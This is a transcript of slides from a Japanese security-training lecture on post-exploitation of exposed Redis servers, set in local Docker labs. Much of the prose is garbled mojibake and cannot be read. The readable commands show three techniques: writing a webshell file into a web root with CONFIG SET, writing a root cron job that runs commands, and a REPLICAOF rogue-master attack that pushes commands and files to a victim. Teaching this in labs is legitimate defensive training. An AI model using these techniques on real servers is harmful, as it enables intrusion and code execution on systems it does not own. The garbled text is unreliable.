セキュリティ・キャンプ全国大会2020 オンライン B8 / seccamp2020-b8

Transcript

1. ηΩϡϦςΟɾΩϟϯϓશࠃେձ2020ΦϯϥΠϯ
   Learn the essential way of thinking about vulnerabilities
   through post-exploitation on middlewares
   Teppei Fukuda (@knqyf263)

   Taichi Kotake (@tkmru)
   

   View Slide

2. ͜ͷεϥΠυ͸ຊฤ3FEJTฤͰ͢
   !LORZG࡞੒
   .Z42-1PTUHSF42-ฤ͸ҎԼࢀর
   IUUQTTQFBLFSEFDLDPNULNSVTFDDBNQC
   

   View Slide

3. ຊ೔ͷྲྀΕ
   w ͳͥ1PTU&YQMPJUBUJPOΛֶͿͷ͔ʁ
   w ϛυϧ΢ΣΞͷϩάΠϯޙʹԿ͕ग़དྷΔ͔ʁ
   w .Z42-ฤ
   w 1PTUHSF42-ฤʢϋϯζΦϯʣ
   w 3FEJTฤʢϋϯζΦϯʣ
   w %PDLFSฤ
   w ԋश
   

   View Slide

4. ࣗݾ঺հ
   
   w ໊લɿ5FQQFJ'VLVEB !LORZG
   
   w ॴଐɿ"RVB4FDVSJUZ4PGUXBSF-UE
   0QFO4PVSDF5FBN
   0QFO4PVSDF&OHJOFFS
   w ॴࡏ஍ɿ5FM"WJW *TSBFM
   

   View Slide

5. ࣗݾ঺հ
   
   w ໊લɿ5BJDIJ,PUBLF !ULNSV
   
   w ॴଐɿגࣜձࣾΞΧπΩ
   ɹɹɹηΩϡϦςΟΤϯδχΞ
   w ॴࡏ஍ɿ౦ژ
   w ஶॻ
   
   
   w 8%#13&447PM
   ಛूπʔϧͰ؆୯ʂ͸͡Ίͯͷ੬ऑੑௐࠪʢٕज़ධ࿦ࣾʣ
   w ϦόʔεΤϯδχΞϦϯάπʔϧ(IJESB࣮ફΨΠυʢϚΠφϏग़൛ʣ
   

   View Slide

6. ͳͥ1PTU&YQMPJUBUJPOΛֶͿͷ͔ʁ
   

   View Slide

7. 1PTU&YQMPJUBUJPOͱ͸
   w $BSMPT1FSF[ .FUBTQMPJU։ൃνʔϜʣ
   w 4IFMMJT0OMZUIF#FHJOOJOHʮγΣϧ͸࢝·Γʹա͗ͳ͍ʯ
   w &YQMPJUΛ੒ޭͤͨ͋͞ͱͷߦಈ
   w ৵ೖ͔ͯ͠ΒԿΛ͢Δͷ͔ʁ͕ॏཁ
   w ྫ
   w ݖݶঢ֨
   w ύεϫʔυɾϋογϡͷऔಘ
   w ΩʔϩΨʔ
   w ύέοτεχοϑΝʔ
   w FUD
   

   View Slide

8. 3FDPOOBJTTBODF
   8FBQPOJ[BUJPO
   %FMJWFSZ
   &YQMPJUBUJPO
   *OTUBMMBUJPO
   $PNNBOE
   $POUSPM
   "DUJPOPO
   0CKFDUJWFT
   $ZCFS
   ,JMM$IBJO
   

   View Slide

9. ఁ࡯
   ࣄલௐࠪ
   λʔήοτಛఆ
   ෢ثԽ
   Ϛϧ΢ΣΞ࡞੒
   Exploit४උ
   ഑ૹ
   λʔήοτ΁઀ଓ
   ඪతܕϝʔϧ
   ϑΟογϯά
   ߈ܸ
   ੬ऑੑΛར༻
   ෆਖ਼ίʔυͷ࣮ߦ
   Πϯετʔϧ
   όοΫυΞઃஔ
   ৵ೖ؀ڥௐࠪ
   ৵ೖ֦େ
   ݖݶঢ֨
   ԣײછ
   ໨తୡ੒
   ৘ใ઄औɾվ͟Μ
   γεςϜഁյ
   ߈ܸͷྲྀΕʢߨٛ༻ʹ΍΍վมʣ
   

   View Slide

10. ఁ࡯
    ෢ثԽ
    ഑ૹ
    ߈ܸ
    Πϯετʔϧ
    ৵ೖ֦େ
    ໨తୡ੒
    कΔଆͷࢹ఺ʢ͋͘·ͰҰྫʣ
    Ϛϧ΢ΣΞఴ෇ͷ
    ϝʔϧݕ஌
    αϯυϘοΫε
    Ϛϧ΢ΣΞͷ࣮ߦݕ஌
    ֎෦௨৴ͷՄࢹԽɾ؂ࢹ
    ෆਖ਼ͳ௨৴ݕग़
    αʔόͳͲͷ
    ΞΫηε؂ࢹ
    ϑΝΠϧ؂ࢹ
    

    View Slide

11. ఁ࡯
    ෢ثԽ
    ഑ૹ
    ߈ܸ
    Πϯετʔϧ
    ৵ೖ֦େ
    ໨తୡ੒
    ࠓճͷߨٛ͸
    ͜͜ͷ࿩͕ϝΠϯ
    

    View Slide

12. ։ൃ؀ڥͷμϛʔσʔλ͕
    ౪·Ε͚ͨͩʁ
    01
    S T E P
    02
    S T E P
    03
    S T E P
    04
    S T E P
    05
    S T E P
    ։ൃαʔόͷroot
    ͸औΒΕͨʁ
    ຊ൪αʔόʹ΋
    ৵ೖ͞Εͨʁ
    Active Directoryʹ
    ৵ೖ͞Εͨʁ
    DB͔Βݸਓ৘ใΛ
    ౪·Εͨʁ
    ৵ೖɾ৵֐ൣғͷ೺Ѳ͸ॏཁ
    

    View Slide

13. 01
    S T E P
    02
    S T E P
    03
    S T E P
    04
    S T E P
    05
    S T E P
    ৵ೖޙͷ߈ܸํ๏ΛֶΜͰ͓͘
    ΠϯύΫτ͕શ͘ҟͳΔ
    μϛʔσʔλ ݸਓ৘ใ
    ैۀһ৘ใ
    ৵ೖޙʹԿ͕ग़དྷͨͷ͔ʁΛ஌͓ͬͯ͘
    

    View Slide

14. ݱ࣮ੈքͷ࿩
    

    View Slide

15. View Slide

16. View Slide

17. શͯ೥ͷهࣄ
    ࠓϗοτͳ࿩୊
    

    View Slide

18. ϛυϧ΢ΣΞͷޡͬͨެ։
    w ઃఆϛε΍௿͍ηΩϡϦςΟҙࣝʹΑΓϛυϧ΢ΣΞΛΠϯλʔωοτ্ʹ
    ೝূແ͠ͰʢԾʹ͋ͬͯ΋ऑ͍ೝূͰʣެ։ͯ͠͠·͏ࣄྫ͸ඇৗʹଟ͍
    w 3FEJT
    w &MBTUJDTFBSDI
    w %PDLFS"1*
    w .Z42-
    w 1PTUHSF42-
    w FUD
    ߈ܸऀ͸ϩάΠϯ͠์୊
    

    View Slide

19. *OUFSOFU
    S
    1SJWBUF/FUXPSL
    *OUFSOFU
    S
    1VCMJD/FUXPSL
    

    View Slide

20. %#αʔόʹϩάΠϯ͢Δํ๏
    ίϚϯυྫ
    w .Z42-
    w NZTRMVSPPUIJQΞυϨε
    w 1PTUHSFT%#
    w QTRM6QPTUHSFTIJQΞυϨε
    w 3FEJT
    w SFEJTDMJIJQΞυϨε
    

    View Slide

21. %#αʔό΁ͷϒϧʔτϑΥʔε
    /4&ʢ/NBQ4DSJQUJOH&OHJOFʣ
    w ೝূ͕͔͔͍ͬͯͨ৔߹Ͱ΋ऑ͍΋ͷͳΒ؆୯ʹಥഁՄೳ
    w /NBQʹ෇ଐ͍ͯ͠ΔεΫϦϓτͰϒϧʔτϑΥʔε߈ܸͰ͖Δ
    w /NBQʹ͸εΫϦϓτΤϯδϯʢ/4&ʣ͕౥ࡌ͞Ε͍ͯΔ
    w ྫONBQWQŠTDSJQUNZTRMCSVUFJQΞυϨε
    w ߈ܸऀ͸؆୯ʹ߈ܸͰ͖Δ
    

    View Slide

22. ϩάΠϯग़དྷͨʂऴΘΓʁ
    "Middleware Exploitation is Only the Beginning"
    5FQQFJ'VLVEB
    

    View Slide

23. ఁ࡯
    ෢ثԽ
    ഑ૹ
    ߈ܸ
    Πϯετʔϧ
    ৵ೖ֦େ
    ໨తୡ੒
    ϛυϧ΢ΣΞ΁ͷ৵ೖ͸࢝·Γ
    ·ͩ͜͜ Ͳ͜·Ͱग़དྷΔʁ
    

    View Slide

24. ఁ࡯
    ෢ثԽ
    ഑ૹ
    ߈ܸ
    Πϯετʔϧ
    ৵ೖ֦େ
    ໨తୡ੒
    ຊߨٛͷର৅
    લఏɿϛυϧ΢ΣΞʹ৵ೖ
    ϑΝΠϧͷಡΈॻ͖
    γΣϧͷୣऔ
    ˞ԣײછͳͲ͸ର৅֎ͱ͠·͢
    

    View Slide

25. %#αʔόʹϩάΠϯͰ͖ͨ৔߹
    Կ͕Ͱ͖Δ͔ʁ
    .Z42-1PTUHSF42-ฤ͸ҎԼࢀর
    IUUQTTQFBLFSEFDLDPNULNSVTFDDBNQC
    

    View Slide

26. .Z42-ฤ
    .Z42-1PTUHSF42-ฤ͸ҎԼࢀর
    IUUQTTQFBLFSEFDLDPNULNSVTFDDBNQC
    

    View Slide

27. 1PTUHSFT42-ฤ
    .Z42-1PTUHSF42-ฤ͸ҎԼࢀর
    IUUQTTQFBLFSEFDLDPNULNSVTFDDBNQC
    

    View Slide

28. 3FEJTฤ
    

    View Slide

29. w 3FEJTʹ͸,FZ7BMVFΛϑΝΠϧͱͯ͠ॻ͖ग़͢ػೳ͕͋Γɺॻ͖ग़͠ઌ͸
    3FEJTίϚϯυͰมߋՄೳ
    w ೚ҙͷ৔ॴʹσʔλΛॻ͖ग़͢͜ͱ͕ग़དྷΔ
    CONFIG SETΛ༻͍ͨํ๏
    $ redis-cli
    127.0.0.1:6379> config get dir
    1) "dir"
    2) "/data"
    127.0.0.1:6379> config get dbfilename
    1) "dbfilename"
    2) "dump.rdb"
    

    View Slide

30. σʔλΛdumpͯ͠ΈΔ
    $ docker run -d --name redis -p 127.0.0.1:6379:6379 redis:5.0
    $ docker exec -it redis bash
    root@824e916202fd:/data# redis-cli
    127.0.0.1:6379> set foo bar
    OK
    127.0.0.1:6379> save
    OK
    $ 127.0.0.1:6379> exit
    root@824e916202fd:/data# cat dump.rdb
    REDIS0009 redis-ver5.0.10
    redis-bits@ctimeused-mem
    aof-preamblefoobarb_ γϦΞϥΠζ͞Ε͍ͯΔ͕
    อଘͨ͠GPPCBS͕
    ೖ͍ͬͯΔ͜ͱ͕֬ೝͰ͖Δ
    

    View Slide

31. w ߨٛ༻ͷΠϝʔδΛىಈ͠ɺSFEJTDMJͰϩάΠϯ͠·͢
    w ·ͨɺϒϥ΢βͰIUUQMPDBMIPTUΛ։͍ͯQIQJOGP͕ݟ͑Δ͜ͱΛ
    ֬ೝͯ͠Լ͍͞
    ࣮ࡍʹ΍ͬͯΈΔʢWebshellʣ
    $ docker rm -f redis
    $ docker run -d --name redis -p 127.0.0.1:10080:80 -p
    127.0.0.1:6379:6379 knqyf263/redis-configset-webshell
    $ redis-cli
    127.0.0.1:6379> ping
    PONG
    

    View Slide

32. w QIQJOGPʹΑΓVTSTIBSFOHJOYIUNM͕υΩϡϝϯτϧʔτͱ෼͔ͬͨͷͰɺ
    DPOpHTFUEJSͰࢦఆ
    w %#ͷμϯϓͳͷͰΰϛ͕ೖΔ͕ɺ QIQ Ͱғͬͨͱ͜Ζ͕1)1ͱͯ͠ೝࣝ͞
    ΕΔͷͰલޙͷΰϛ͸໰୊ͳ͍
    PHPͷϑΝΠϧΛॻ͖ࠐΉʢWebshellʣ
    127.0.0.1:6379> config set dir /usr/share/nginx/html
    OK
    127.0.0.1:6379> config set dbfilename redis.php
    OK
    127.0.0.1:6379> set test ''
    OK
    127.0.0.1:6379> save
    OK
    127.0.0.1:6379> exit
    

    View Slide

33. w IUUQMPDBMIPTUSFEJTQIQ DNEJEͳͲͰίϚϯυ͕࣮ߦ͞ΕΔ͜ͱΛ֬ೝ
    w IUUQMPDBMIPTUSFEJTQIQ DNEUPVDICBSͳͲͰϑΝΠϧ΋࡞੒Ͱ͖Δ
    w ࣮ࡍʹίϯςφʹϩάΠϯͯ͠ϑΝΠϧ͕࡞੒͞Ε͍ͯΔ͜ͱΛ֬ೝ͢Δ
    ֬ೝʢWebshellʣ
    $ docker exec -it redis bash
    root@6b3e28756441:/data# ls /usr/share/nginx/html/
    bar index.html index.php redis.php
    root@6b3e28756441:/data# cat /usr/share/nginx/html/
    redis.php
    REDIS0009 redis-ver5.0.10
    redis-bits@ctimeused-mem
    aof-preambletest'
    ΰϛ͕ೖ͍ͬͯΔ͕
    QIQ ͸ਖ਼͘͠
    ॻ͖ࠐ·Ε͍ͯΔ
    

    View Slide

34. w DSPO͸ίϚϯυΛఆظతʹ࣮ߦ͢ΔͨΊʹ࢖ΘΕΔ
    w ಛఆͷҐஔʹҎԼͷϑΥʔϚοτͰॻ͖ࠐΉͱίϚϯυ͕ఆظతʹ࣮ߦ͞ΕΔ
    ʢ࣮ࡍʹ͸DSPOUBCFͳͲͷίϚϯυΛ௨ͯ͠ฤू͢Δʣ
    w FUDDSPOUBC WBSTQPPMDSPO FUD
    crontabόʔδϣϯ
    #crontabͷॻࣜ
    # ʢߦ಄ͷ # ϚʔΫ͸ίϝϯτߦΛࣔ͢ʣ
    # +------------ ෼ (0 - 59)
    # | +---------- ࣌ (0 - 23)
    # | | +-------- ೔ (1 - 31)
    # | | | +------ ݄ (1 - 12)
    # | | | | +---- ༵೔ (0 - 6) (೔༵೔=0)
    # | | | | |
    # * * * * * ࣮ߦ͞ΕΔίϚϯυ
    3FEJT͔ΒDSPOUBCʹॻ͖ࠐΊ͹
    ೚ҙίϚϯυ͕࣮ߦՄೳ
    

    View Slide

35. w ߨٛ༻ͷΠϝʔδΛىಈ͠ɺSFEJTDMJͰϩάΠϯ͠·͢
    ࣮ࡍʹ΍ͬͯΈΔʢcrontabʣ
    $ docker rm -f redis # ͖ͬ͞ͷ΍ͭΛফ͓ͯ͘͠
    $ docker run -d --name redis -p 127.0.0.1:6379:6379 knqyf263/redis-configset-
    cron
    $ redis-cli
    127.0.0.1:6379> ping
    PONG
    

    View Slide

36. w ࠓճ͸WBSTQPPMDSPOSPPUʹॻ͖ࠐΉ
    w ˞ҰൠϢʔβͩͱ௨ৗ্هͷσΟϨΫτϦʹ͸ॻ͖ࠐΈݖݶ͕ͳ͍
    w ΰϛ͕ೖΔ͕ɺߦ୯ҐͰͷղऍͳͷͰվߦ͓͚ͯ͠͹໰୊ͳ͘ಈ࡞
    cronͷઃఆΛॻ͖ࠐΉ
    127.0.0.1:6379> config set dir /var/spool/cron/
    OK
    127.0.0.1:6379> config set dbfilename root
    OK
    127.0.0.1:6379> set payload "\n*/1 * * * * /bin/touch /tmp/foo\n"
    OK
    127.0.0.1:6379> save
    OK
    127.0.0.1:6379> exit
    

    View Slide

37. w ࣮ࡍʹίϯςφʹϩάΠϯͯ͠ϑΝΠϧ͕࡞੒͞Ε͍ͯΔ͜ͱΛ֬ೝ͢Δ
    ֬ೝʢcrontabʣ
    $ docker exec -it redis bash
    [root@267da3bc4d5f /]# ls /tmp/foo
    /tmp/foo
    [root@267da3bc4d5f /]# cat /var/spool/cron/root
    REDIS0007 redis-ver3.2.12
    redis-bits@ctimeused-meme
    payload!
    */1 * * * * /bin/touch /tmp/foo
    Q<Ў
    K
    ͜ͷߦ͚͕ͩ
    ਖ਼ৗʹղऍ͞ΕΔ
    ෼ʹ౓࣮ߦʣ
    

    View Slide

38. w ੈ͸େΫϥ΢υ࣌୅
    w ίϯςφԽ͞Ε͍ͯΕ͹8FCαʔόͱ3FEJTαʔό͸௨ৗผʹ͢Δ
    w DSPOUBC͸͋·Γ࢖ΘΕͳ͍
    w ڧ͍ݖݶ͕ඞཁ
    CONFIG SETͷ໰୊఺
    ͋·Γࢗ͞Βͳ͍
    

    View Slide

39. w 3FEJTͷϨϓϦέʔγϣϯػೳΛѱ༻͢Δ
    REPLICAOFΛ༻͍ͨํ๏
    εϨʔϒ͕ηοτΞοϓ͞ΕͨΒɺεϨʔϒ͸઀ଓΛ௨ͯ͡
    4:/$ίϚϯυΛૹΓ·͢ɻॳճͷ઀ଓͰ΋࠶઀ଓͰ΋ಉ͡Ͱ͢ɻ
    Ϛελʔ͸όοΫάϥ΢ϯυɾηʔϒΛ։࢝͠ɺ·ͨɺҎ߱ʹड৴͢Δɺ
    σʔλɾηοτΛมߋ͢Δ͢΂ͯͷίϚϯυͷόοϑΝΛ࢝Ί·͢ɻ
    όοΫάϥ΢ϯυɾηʔϒ͕׬ྃͨ͠ΒɺϚελʔ͸σʔλϕʔεϑΝΠϧΛ
    εϨʔϒʹసૹ͠ɺεϨʔϒ͸ͦΕΛσΟεΫʹอଘɺ͓ΑͼϝϞϦ΁ϩʔυ͠·͢ɻ
    ͦͷޙɺϚελʔ͸͢΂ͯͷόοϑΝ͞ΕͨίϚϯυΛεϨʔϒʹૹ৴͠·͢ɻ
    ͜Ε͸ίϚϯυͷετϦʔϜͱ࣮ͯ͠ݱ͞Ε͍ͯͯɺ
    3FEJTϓϩτίϧͦͷ΋ͷͱಉ͡ϑΥʔϚοτΛ΋ͪ·͢ɻ
    IUUQTSFEJTEPDVNFOUBTJPOKBQBOFTFSFBEUIFEPDTJPKBMBUFTUUPQJDTSFQMJDBUJPOIUNM
    

    View Slide

40. 3FEJTͷ3FQMJDBUJPO
    .BTUFS
    3FQMJDB
    4:/$14:/$
    %#μϯϓ
    4:/$͸14:/$ͷݹ͍൛Ͱ͕͢ɺ
    ࠓճͷߨٛͰ؆୯ͷͨΊʹ࢖͏ͷͰॻ͍͍ͯ·͢
    σΟεΫʹอଘ
    ϝϞϦʹϩʔυ
    ίϚϯυసૹ
    

    View Slide

41. 3FQMJDBͷϑϦΛͯ͠.BTUFSʹ4:/$14:/$ΛൃߦͰ͖Δ
    SYNC/PSYNCͷڍಈΛ͔֬ΊΔ
    εϨʔϒ͕ηοτΞοϓ͞ΕͨΒɺεϨʔϒ͸઀ଓΛ௨ͯ͡
    4:/$ίϚϯυΛૹΓ·͢ɻॳճͷ઀ଓͰ΋࠶઀ଓͰ΋ಉ͡Ͱ͢ɻ
    Ϛελʔ͸όοΫάϥ΢ϯυɾηʔϒΛ։࢝͠ɺ·ͨɺҎ߱ʹड৴͢Δɺ
    σʔλɾηοτΛมߋ͢Δ͢΂ͯͷίϚϯυͷόοϑΝΛ࢝Ί·͢ɻ
    όοΫάϥ΢ϯυɾηʔϒ͕׬ྃͨ͠ΒɺϚελʔ͸σʔλϕʔεϑΝΠϧΛ
    εϨʔϒʹసૹ͠ɺεϨʔϒ͸ͦΕΛσΟεΫʹอଘɺ͓ΑͼϝϞϦ΁ϩʔυ͠·͢ɻ
    ͦͷޙɺϚελʔ͸͢΂ͯͷόοϑΝ͞ΕͨίϚϯυΛεϨʔϒʹૹ৴͠·͢ɻ
    ͜Ε͸ίϚϯυͷετϦʔϜͱ࣮ͯ͠ݱ͞Ε͍ͯͯɺ
    3FEJTϓϩτίϧͦͷ΋ͷͱಉ͡ϑΥʔϚοτΛ΋ͪ·͢ɻ
    IUUQTSFEJTEPDVNFOUBTJPOKBQBOFTFSFBEUIFEPDTJPKBMBUFTUUPQJDTSFQMJDBUJPOIUNM
    

    View Slide

42. SYNC/PSYNCͷڍಈΛ͔֬ΊΔ
    $ docker rm -f redis # ͖ͬ͞ͷ͸ফ͢
    $ docker run -d --name redis -p 127.0.0.1:6379:6379 redis:5.0
    $ telnet localhost 6379
    SYNC
    $176
    REDIS0009 redis-ver5.0.10
    redis-bits@ctime
    used-mem°repl-stream-dbrepl-
    id(8d0e0dc1a11f2129499a0a8ff1d25151f69e679e
    repl-offset8
    aof-preamble$*1
    %#ͷμϯϓʢ3%#ϑΥʔϚοτʣ͕߱ͬͯ͘Δ
    

    View Slide

43. 5FMOFUͰ4:/$ίϚϯυΛൃߦ
    .BTUFS
    4:/$14:/$
    3%#ϑΝΠϧ
    5FMOFU
    ଞͷίϚϯυಉ༷
    ௨ৗͷ3FEJTϓϩτίϧ
    1$
    

    View Slide

44. PING
    $ telnet localhost 6379
    SYNC
    ...
    *1
    $4
    PING
    4:/$Λൃߦͯ͠͠͹Β͘଴ͭͱ.BTUFS͔Β1*/(͕ඈΜͰ͘Δ
    ݟ׳Εͳ͍ܗ
    

    View Slide

45. Redis Serialization Protocol (RESP)
    $ telnet localhost 6379
    SYNC
    ...
    *1
    $4
    PING
    DMJFOUTFSWFSؒͷ΍ΓͱΓͷͨΊͷϓϩτίϧ .BTUFS3FQMJDB΋ؚΉʣ
    "SHVNFOUTDPVOU
    "SHVNFOUTMFOHUI
    "SHVNFOUTWBMVF
    IUUQTSFEJTJPUPQJDTQSPUPDPM
    

    View Slide

46. Redis Serialization Protocol (RESP)
    *3
    $3
    SET
    $7
    keyname
    $5
    value
    WBMVFͷ௕͞͸
    LFZOBNFͷ௕͞͸
    4&5ͷ௕͞͸
    Ҿ਺͸ͭ
    4&5LFZOBNFWBMVF
    

    View Slide

47. w छྨ͕αϙʔτ͞Ε͍ͯΔ
    w 1MBJOUFYUʢεϖʔε۠੾Γʣ
    w 4&5LFZOBNFWBMVF
    w $VTUPN
    w
    
    4&5
    
    LFZOBNF
    
    WBMVF
    Redis Serialization Protocol (RESP)
    

    View Slide

48. ཪଆ·Ͱཧղ͢Δͷ͕ॏཁ
    ͨͩར༻͢Δ͚ͩ
    FHSFEJTDMJ΍ϥΠϒϥϦͰσʔλΛग़͠ೖΕ
    ཪଆ·Ͱཧղ͢Δ
    FH3FEJT4FSJBMJ[BUJPO1SPUPDPMΛֶͿ
    ηΩϡϦςΟʹ͓͍ͯ͸͕ͬͪ͜ॏཁ
    

    View Slide

49. w .BTUFSͰ࣮ߦ͞ΕͨίϚϯυ͸3FQMJDBʹసૹ͞ΕΔ
    RDBϑΝΠϧͷૹ৴ޙ
    εϨʔϒ͕ηοτΞοϓ͞ΕͨΒɺεϨʔϒ͸઀ଓΛ௨ͯ͡
    4:/$ίϚϯυΛૹΓ·͢ɻॳճͷ઀ଓͰ΋࠶઀ଓͰ΋ಉ͡Ͱ͢ɻ
    Ϛελʔ͸όοΫάϥ΢ϯυɾηʔϒΛ։࢝͠ɺ·ͨɺҎ߱ʹड৴͢Δɺ
    σʔλɾηοτΛมߋ͢Δ͢΂ͯͷίϚϯυͷόοϑΝΛ࢝Ί·͢ɻ
    όοΫάϥ΢ϯυɾηʔϒ͕׬ྃͨ͠ΒɺϚελʔ͸σʔλϕʔεϑΝΠϧΛ
    εϨʔϒʹసૹ͠ɺεϨʔϒ͸ͦΕΛσΟεΫʹอଘɺ͓ΑͼϝϞϦ΁ϩʔυ͠·͢ɻ
    ͦͷޙɺϚελʔ͸͢΂ͯͷόοϑΝ͞ΕͨίϚϯυΛεϨʔϒʹૹ৴͠·͢ɻ
    ͜Ε͸ίϚϯυͷετϦʔϜͱ࣮ͯ͠ݱ͞Ε͍ͯͯɺ
    3FEJTϓϩτίϧͦͷ΋ͷͱಉ͡ϑΥʔϚοτΛ΋ͪ·͢ɻ
    IUUQTSFEJTEPDVNFOUBTJPOKBQBOFTFSFBEUIFEPDTJPKBMBUFTUUPQJDTSFQMJDBUJPOIUNM
    

    View Slide

50. 5FMOFUͰίϚϯυΛ؍࡯
    .BTUFS
    4:/$14:/$
    3%#ϑΝΠϧ
    1$
    ίϚϯυసૹ
    ίϚϯυ࣮ߦ
    

    View Slide

51. $ telnet localhost 6379
    SYNC
    ...
    *2
    $6
    SELECT
    $1
    0
    *3
    $3
    set
    $3
    foo
    $3
    bar
    $ redis-cli
    127.0.0.1:6379> set foo bar
    OK
    %#Λબ୒
    4&-&$5
    LFZWBMVFΛอଘ
    TFUGPPCBS
    ͜ΕΒͷίϚϯυ͸3FQMJDBͰ୯ʹ࣮ߦ͞ΕΔ
    

    View Slide

52. 3&1-*$"0'ͷѱ༻
    7JDUJN
    3FQMJDB
    "UUBDLFS
    w 3&1-*$"0'Λ࢖͑͹௨ৗͷ3FEJTΠϯελϯεΛڧҾʹ3FQMJDBʹઃఆՄೳ
    w .BTUFSΛ"UUBDLFSͷϚγϯʹ͓͚ͯ͠͹4:/$͕3FQMJDB͔ΒඈΜͰ͘Δ
    3&1-*$"0'Ͱ"UUBDLFSΛ
    .BTUFSʹઃఆ͢Δ
    4:/$14:/$
    

    View Slide

53. 3FQMJDBʹ೚ҙͷ3FEJTίϚϯυΛൃߦՄೳ
    3%#ϑΝΠϧ
    ೚ҙͷίϚϯυΛྲྀ͠ࠐΉ
    w .BTUFSʹͳΓ͢·ͯ͠೚ҙͷίϚϯυΛసૹ͢Δͱ3FQMJDBͰ࣮ߦ͞ΕΔ
    3&1-*$"0'Ͱ"UUBDLFSΛ
    .BTUFSʹઃఆ͢Δ
    4:/$14:/$
    "UUBDLFS 3FQMJDB
    

    View Slide

54. 3FQMJDBʹ೚ҙͷ3FEJTίϚϯυΛൃߦՄೳ
    3FEJT
    "UUBDLFS
    w 443'ͳͲͰϨεϙϯε͕ड͚औΕͳ͍ঢ়گͰ΋༗ޮ
    w Πϯλʔωοτʹ3FEJTΛࡽ͍ͯ͠ͳͯ͘΋ࢗ͞Δ
    ੬ऑͳ8FCαʔό
    ࣾ಺
    3FRVFTU
    3&1-*$"0'
    4:/$
    

    View Slide

55. 3FQMJDBʹ೚ҙͷ3FEJTίϚϯυΛൃߦՄೳ
    w ࣮ࡍʹ͸ϨεϙϯεΛड͚औΔͨΊʹ͸΋͏গ͠޻෉͕ඞཁ
    w ຊߨٛͰ͸Πϯλʔωοτ্ʹެ։͞Εͯ͠·ͬͨ3FEJTͳͲɺ௚઀3FEJTʹೖΕΔલ
    ఏͰਐΊΔͨΊݩ͔Β೚ҙͷ3FEJTίϚϯυ͕࣮ߦՄೳͰϨεϙϯε΋ड͚औΕΔ૝ఆ
    IUUQT[FSPOJHIUTSVXQDPOUFOUVQMPBETNBUFSJBMTSFEJTQPTUFYQMPJUBUJPOQEG
    3FEJT
    "UUBDLFS
    ೚ҙͷ3FEJTίϚϯυ
    

    View Slide

56. w ࠶ͼ3FQMJDBUJPOͷڍಈΛ֬ೝ
    REPLICAOFΛ༻͍ͨํ๏
    εϨʔϒ͕ηοτΞοϓ͞ΕͨΒɺεϨʔϒ͸઀ଓΛ௨ͯ͡
    4:/$ίϚϯυΛૹΓ·͢ɻॳճͷ઀ଓͰ΋࠶઀ଓͰ΋ಉ͡Ͱ͢ɻ
    Ϛελʔ͸όοΫάϥ΢ϯυɾηʔϒΛ։࢝͠ɺ·ͨɺҎ߱ʹड৴͢Δɺ
    σʔλɾηοτΛมߋ͢Δ͢΂ͯͷίϚϯυͷόοϑΝΛ࢝Ί·͢ɻ
    όοΫάϥ΢ϯυɾηʔϒ͕׬ྃͨ͠ΒɺϚελʔ͸σʔλϕʔεϑΝΠϧΛ
    εϨʔϒʹసૹ͠ɺεϨʔϒ͸ͦΕΛσΟεΫʹอଘɺ͓ΑͼϝϞϦ΁ϩʔυ͠·͢ɻ
    ͦͷޙɺϚελʔ͸͢΂ͯͷόοϑΝ͞ΕͨίϚϯυΛεϨʔϒʹૹ৴͠·͢ɻ
    ͜Ε͸ίϚϯυͷετϦʔϜͱ࣮ͯ͠ݱ͞Ε͍ͯͯɺ
    3FEJTϓϩτίϧͦͷ΋ͷͱಉ͡ϑΥʔϚοτΛ΋ͪ·͢ɻ
    IUUQTSFEJTEPDVNFOUBTJPOKBQBOFTFSFBEUIFEPDTJPKBMBUFTUUPQJDTSFQMJDBUJPOIUNM
    

    View Slide

57. 3%#ϑΝΠϧͷಉظ
    .BTUFS
    3FQMJDB
    4:/$14:/$
    %#μϯϓ
    σΟεΫʹอଘ
    ϝϞϦʹϩʔυ
    ͜͜Λվ͟Μ͢Ε͹
    ޷͖ͳϑΝΠϧΛ3FQMJDBʹ
    อଘͤ͞ΒΕͦ͏
    

    View Slide

58. ೚ҙͷϑΝΠϧΛ3FQMJDBʹॻ͖ࠐΊΔ
    ೚ҙͷσʔλ
    w 3%#ϑΝΠϧͷ୅ΘΓʹ޷͖ͳϑΝΠϧΛྲྀ͠ࠐΉ
    3&1-*$"0'
    4:/$14:/$
    "UUBDLFS 3FQMJDB
    

    View Slide

59. 3FQMJDBUJPO*OUFSOBM
    w 1*/(Ͱૄ௨֬ೝ͠ɺ3&1-$0/'Ͱ3FQMJDBͷઃఆΛૹΔ
    1*/(
    "UUBDLFS 3FQMJDB
    10/(
    3&1-$0/'
    0,
    14:/$
    ৄࡉ͸ޙड़
    

    View Slide

60. ϋϯζΦϯ؀ڥ
    w 3FEJT͔Βͷ઀ଓΛड͚Δඞཁ͕͋ΔͷͰEPDLFSDPNQPTFͰࢼ͢
    w SPHVFͱSFEJTͷͭͷίϯςφ͕ىಈ͍ͯ͠Δ
    w جຊతʹSPHVFʹϩάΠϯͯ͠࡞ۀ͢Δ
    SPHVF SFEJT
    EPDLFSDPNQPTF
    SFEJTDMJ
    EPDLFSDPNQPTFFYFD
    ߈ܸ༻؀ڥ ΍ΒΕ3FEJT
    

    View Slide

61. $ cd [޷͖ͳdir]
    $ wget https://gist.githubusercontent.com/
    knqyf263/16232934bd772ee9f8c76f4a10447aa2/raw/
    fa6638ca34f279b1d5f06d1ddf2f83079589fe5b/docker-compose.yml
    $ docker-compose up -d
    $ docker-compose exec rogue bash
    ؀ڥͷىಈ
    w ޷͖ͳσΟϨΫτϦʹҠಈͯ͠EPDLFSDPNQPTFZNMΛμ΢ϯϩʔυ͢Δ
    w EPDLFSDPNQPTFΛىಈͯ͠FYFDͰSPHVFʹϩάΠϯ͢Δ
    ϋϯζΦϯதʹίϯςφ͕ࢮΜͩΒ
    EPDLFSDPNQPTFEPXOEPDLFSDPNQPTFVQE͢Δ
    ʢෆਖ਼ͳ3%#ϑΝΠϧͰΫϥογϡ͢Δ͜ͱ͕͋Δʣ
    

    View Slide

62. REPLICAOFͷઃఆ
    w SFEJTʹରͯ͠SPHVF͔ΒSFEJTDMJͰϩάΠϯ͢Δ
    w 3&1-*$"0'ίϚϯυΛ࢖ͬͯSPHVFͷ൪ϙʔτΛNBTUFSʹࢦఆ
    w EPDLFSDPNQPTF͓͔͛ͰSPHVFͰ໊લղܾͰ͖Δ
    SPHVF SFEJT
    EPDLFSDPNQPTF
    3&1-*$"0'SPHVF
    SFQMJDBͱͯ͠
    NBTUFS SPHVF
    ʹܨ͗ʹདྷΔ
    root@b6d0575dafc4:/rogue# redis-cli -h redis replicaof rogue 10000
    

    View Slide

63. NetcatίϚϯυ
